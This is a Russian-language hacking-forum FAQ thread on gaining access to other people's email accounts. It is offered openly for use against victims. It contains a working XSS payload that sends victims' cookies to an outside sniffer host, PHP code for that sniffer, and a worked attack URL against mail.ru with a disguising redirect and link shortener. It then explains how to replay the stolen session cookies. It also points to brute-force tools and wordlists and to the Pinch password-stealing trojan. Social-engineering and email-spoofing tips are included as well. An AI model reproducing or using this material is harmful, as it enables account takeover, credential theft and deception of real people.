Просмотр полной версии : Небольшой faq
1) XSS - Cross Site Scripting (межсайтовое выполнение сценариев). Чаще всего используется для получения cookies и/или идентификатора сессии (обычно идентификатор сессии виден в url)..
2) Cookie - http://antichat.ru/txt/old/cookie.shtml
3) В почтовых системах используются различные фильтры на управляющие символы, что затрудняет выполнение xss, как их обходить написано здесь :
http://antichat.ru/crackchat/HTML/
4) На снифер обычно передаются значения полученные с помощью xss. Про него написано тут :
http://antichat.ru/sniff/
5) С помощью подделки cookies можно попасть в чужой ящик, для этого можно пользоваться программами Cookie Editor,minibrowser, inetcrack (http://antichat.ru/inetcrack/), IE_XSS_Kit (http://antichat.ru/soft/IE_XSS_Kit.rar)
6) Примеры тут : http://antichat.ru/txt/hmail/
JazzzSummerMan
10.06.2005, 22:43
Граждане, смотрите что у нас теперь есть!
Программка от LittleLamer (http://forum.antichat.ru/member.php?u=1763) для тестирования ВЕБ-Интерфейсов электронной почты на подверженность XSS-атакам. Программа представляет из себя smtp-клиент, которая отсылает на тестируемый адрес письмо в html-формате. В тело сообщения записаны всевозможные скриптовые выражения, они загружаются из конфигурационного файла. Во всех случаях, результат выполнения скрипта - алерт с порядковым номером строки, таким образом мы сразу видим, какие из выражений приводят к запуску скрипта в почте. Идея не нова, но LittleLamer реализвал её в виде одной удобной программы, скажем ему спасибо:)
Методы "вспоминания" пароля (от мыла) (http://forum.antichat.ru/threadnav9930-1-10.html)
Хорошая статья, всем читать пержде чем задать вопрос.
Автор : censored!
Брут:программа которая подбирает пароли по словарю (passlist) Одна из таких прог есть Brutus AET 2 (он может послужить не только для брута мыл)Скачать можно тут http://download.rublev-school.ru/dc/index.php?action=downloadfile&filename=brutus-aet2.rar&directory=&
Словари:файлы в которых находятса сами пароли
скачать можно тут :
http://www.mobilstar.ru/files/dict/
ftp://ftp.funet.fi/pub/unix/security/dictionaries/
http://www.phreak.com/html/wordlists.shtml
http://tpircs.anarxi.st/passwd.txt
http://www.acolytez.com/dict/
ftp://ftp.openwall.com/pub/wordlists/
ftp://ftp.ox.ac.uk/pub/wordlists/
ftp://coast.cs.purdue.edu/pub/dict/wordlists/
http://www.passwords.ru/dic.htm
http://getfile.biz/15660
http://www.outpost9.com/files/WordLists.html
ftp://ftp.cerias.purdue.edu/pub/dict/
http://www.insidepro.com/eng/download.shtml
http://passwords.ru/dic.php
Чем больше словарей тем лутше!
2.Троян +СИ :
Существует спецыализированые программы для вытаскивание паролей от почты аси и другого ...
Ети программы называютса почтовыми троянами
Существуют много троянов таких типов ,самыми известными из них есть xinch и pinch
Скачать pinch можно тут http://aqust1ck.narod.ru/downloads/pinches/pinch2.58.rar (пароль к архиву 132)
Больше прочитать про pinch можно тут http://forum.antichat.ru/thread14387.html
СИ-Соц инженерия ! С помощью ее вы должны войти в доверие человека (одним из лутших способов прикинутса особью противоположного пола)
Еще есть вариант написать письмо не от своего e-mail(а например от suuport@mail.ru) и отослать жертве письмо тчто вышла новая версия какой нить проги для e-mail (тут уже работает фантазия)
Удачного ВАМ ХАКА =)
По всем вопросам пишите мне в ПМ!
Самый простой способ залезть в чужой почтовый ящик ( Реализация пассивных XSS ) :
( к прочтению тех у кого на форуме сообщений <= 1 )
I) Введение
Несколько вводных моментов, для того чтоб понять что происходит:
1) XSS (Cross Site Scripting) - уязвимость веб-приложения которая позволяет вставить html код в страницу
2) Cookies ( http://old.antichat.ru/txt/old/cookie.shtml ) в них как правило содержится сессия - это информация по которой идёт идентификация пользователей ( иногда сессия содержится в URL )
3) С помощью XSS можно перехватить сессию пользователя - мы вставляем в страничку код сткриптового языка (в данном случае это javascript), который выполняется в браузере жертвы. Делается это так :
в переменной document.cookies содержаться соответственно cookies пользователя. Наш javascritp создаёт картинку с именем img и присваиваем атрибуту src ссылку http://mayor.jino-net.ru/sniffer.php?значения_cookies , после знака '?' идут cookies и при загрузки рисунка наш скрипт sniffer.php получит эти данные в параметре QERTY_STRING
<script>img = new Image(); img.src= "http://mayor.jino-net.ru/sniffer.php?"+escape(document.cookie);</script>( функция escape кодирует данные в юникод, это делается для того чтобы если в значения cookies встретиться какой-то управляющий символ, например - #, после него данные не отсекались. При использовании этой функции надо не забыть расшифровать куки пришедшие на сниффер (в php это функция urldecode() ) )
4) Сниффер - скрипт, получающий данные от пользователя и записывающий их в файл. Вот самый простой пример сниффера написанного на php :
<?php
$fp=fopen("log.html","a+t");
fputs($fp,"
Время: ".date("[D d/m/Y H:i]")."<br>
IP: ".$_SERVER['REMOTE_ADDR']."<br>
Откуда: ".htmlentities($_SERVER['HTTP_REFERER'])."<br>
Браузер: ".$_SERVER['HTTP_USER_AGENT']."<br>
QUERY_STRING: ".$_SERVER['QUERY_STRING']."<br><br>
");
fclose($fp);
?>
Идеальным вариантом будет найти активную XSS ( это те которые посылаются в теле письма, т е скрипт выполняется при открытии письма ), находить такие XSS всё сложнее, а вот пассивных XSS хватает даже на очень популярных почтовых системах ( это такие XSS который требуют участие жертвы в их исполнение - жертва должна кликнуть по ссылке, html код вставляется в страницу через параметры передаваемые странице в URL )
Такие XSS находить очень просто:
1) Смотрим в каком домене устанавливаются cookies. Для этого регистрируем себе ящик на том сервере, где хотим найти XSS, и заходим в свой ящик через программку minibrowser ( скачать программку можно тут - http://mayor.narod.ru/minibrowser.rar ), открываем вкладку cookies и смотрим значение domain, вот в этом домене и в доменах младшего уровня мы и будем искать пассивную XSS
2) Вставляем в параметр ссылки , значение которого, как вам кажется, попадают на страницу, следующий код:
"'><script>alert('XSS!')</script>
и если вылезет алерт с текстом XSS! то мы нашли что искали :)
--------------------------------------------------------------------------------------
II) Реализация пассивной XSS на примере mail.ru
Итак мы нашли пассивную XSS
http://map.mail.ru/rus/print.asp?gst=rus_mail&w=1&h=1&vis="'><script>alert()</script>
Вставим туда наш скрипт который отправит cookies нам на сниффер, а для конспирации перекинем жертву на другую страничку, например на рисунок:
http://map.mail.ru/rus/print.asp?gst=rus_mail&w=1&h=1&vis="'><script>img=new/**/Image();img.src="http://mayor.jino-net.ru/sniffer.php?"+document.cookie;location.href="http://images.cards.mail.ru/snovimgodom1.jpg"</script>
Подсунуть жертве такую ссылку, так чтоб по ней перешли, сложно, поэтому идём на ShortUrl.ru (http://ShortUrl.ru) и создаём редирект, вот он:
http://surl.ru/snovimgodom1.jpg
Посмотреть можно тут (http://surl.ru/stats/snovimgodom1.jpg)
После того как жертва перешла по ссылке идём на наш снифер и там видим что-то вроде :
Mpop=1158589439:5f414670775c567219050219091d001b03 0d004f6a5d5e465e070d051b00770b1f44544b5c5fd5001080 f031659584743174345:mayor@list.ru:; mrcu=808244948A287F383B4D0100007F; p=FjoAAMr3WwAA; MailUser=1; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAELwgcA; p_sid=0271b370d2e915582646a6b5b1a667c3; c56=0rpHRQAAAABkawEAAAAA; c8=wxNBRQAAAAELigMAAAAAAQdUAgAAAAABB1gBAAAAAAEYTgE AAAAAASHUAgAAAAABIk8BAAAAAAEh1QEAAAAAARW6AQAAAAABB rACAAAAAAEG7AIAAAAA;
Теперь нам нужно подделать cookies, для этого мы используем программку minibrowser
Разбиваем cookies вот так , т е каждый параметр на своей строке и в конце точка с запятой
Mpop=1158589439:5f414670775c567219050219091d001b03 0d004f6a5d5e465e070d051b00770b1f44544b5c5fd5001080 f031659584743174345:mayor@list.ru:;
mrcu=808244948A287F383B4D0100007F;
p=FjoAAMr3WwAA;
MailUser=1;
t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAELwgcA;
p_sid=0271b370d2e915582646a6b5b1a667c3;
c56=0rpHRQAAAABkawEAAAAA;
c8=wxNBRQAAAAELigMAAAAAAQdUAgAAAAABB1gBAAAAAAEYTgE AAAAAASHUAgAAAAABIk8BAAAAAAEh1QEAAAAAARW6AQAAAAABB rACAAAAAAEG7AIAAAAA;
Открываем minibrowser и вставляем в поле URL http://mail.ru/ , нажимаем GET , заходим в свой ящик, затем во вкладку "Сookies" вместо того что там находиться, вставляем куки со сниффера и нажимаем GET и если сессия не привязана к ip (что встретишь не часто), то мы в чужом ящике. Сессия на mail.ru "живёт", несколько часов, так что проделывать это нужно сразу, после того как cookies пришли на сиффер
http://mayor.jino-net.ru/minibrowser.gif
Остается добавить, что большое количество пользователей ставить одинаковые пароли, как на почтовый ящик, так и на различные форумы, чаты и тд, с которых приходят подтверждения о регистрации с логином и паролем ...
Constantine
26.01.2007, 19:23
Анонимная отправка писем.
Достаточно распространенный вопрос на форуме
ВОПРОС:
Как отправить письмо от чужого имени(анонимно) и как отправлять письма в виде HTML?
Ответ:
Все это делаеться с помощью очень удобного сервиса http://shorturl.ru/mail/index.php или http://www.papierenkarton.nl/m/mail.php
Темы про анонимную отправку писем:
Анонимная отправка писем (http://forum.antichat.ru/showthread.php?t=44148)
Анонимная почта. Html (http://forum.antichat.ru/showthread.php?t=31379)
анонимная отправка почты (http://forum.antichat.ru/showthread.php?t=32977)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot